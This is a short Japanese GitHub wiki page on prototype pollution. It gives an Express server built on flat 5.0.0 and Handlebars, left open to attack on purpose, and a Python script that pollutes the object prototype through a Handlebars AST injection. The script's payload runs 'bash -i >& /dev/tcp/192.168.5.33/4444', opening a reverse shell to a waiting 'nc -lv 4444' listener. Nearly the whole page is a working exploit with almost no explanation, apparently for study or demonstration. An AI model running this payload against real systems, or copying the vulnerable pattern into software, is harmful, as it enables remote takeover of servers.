prototype pollution 02 - yujitounai/helloworld GitHub Wiki

prototype pollution 01

AST Injection

脆弱なソースコード (node flat 5.0.0)

const express = require('express');
const { unflatten } = require('flat');
const bodyParser = require('body-parser');
const Handlebars  = require('handlebars');
 
const app = express();
app.use(bodyParser.json())
app.get('/', function (req, res) {
    var source = "<h1>It works!</h1>";
    var template = Handlebars.compile(source);
    res.end(template({}));
});
app.post('/vulnerable', function (req, res) {
    let object = unflatten(req.body);
    res.json(object);
});
 
app.listen(80);

攻撃コード

ポート4444にリバースシェルを張る

import requests
TARGET_URL = 'http://localhost:6002'
# make pollution
requests.post(TARGET_URL + '/vulnerable', json = {
    "__proto__.type": "Program",
    "__proto__.body": [{
        "type": "MustacheStatement",
        "path": 0,
        "params": [{
            "type": "NumberLiteral",
            "value": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/192.168.5.33/4444 0>&1'`)"
        }],
        "loc": {
            "start": 0,
            "end": 0
        }
    }]
})
# execute
r = requests.get(TARGET_URL)
print(r.text)

待ち受けサーバー

nc -lv 4444

参考

https://blog.p6.is/AST-Injection/

prototype pollution 02 - yujitounai/helloworld GitHub Wiki

prototype pollution 01

脆弱なソースコード (node flat 5.0.0)

攻撃コード

ポート4444にリバースシェルを張る

待ち受けサーバー

参考

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️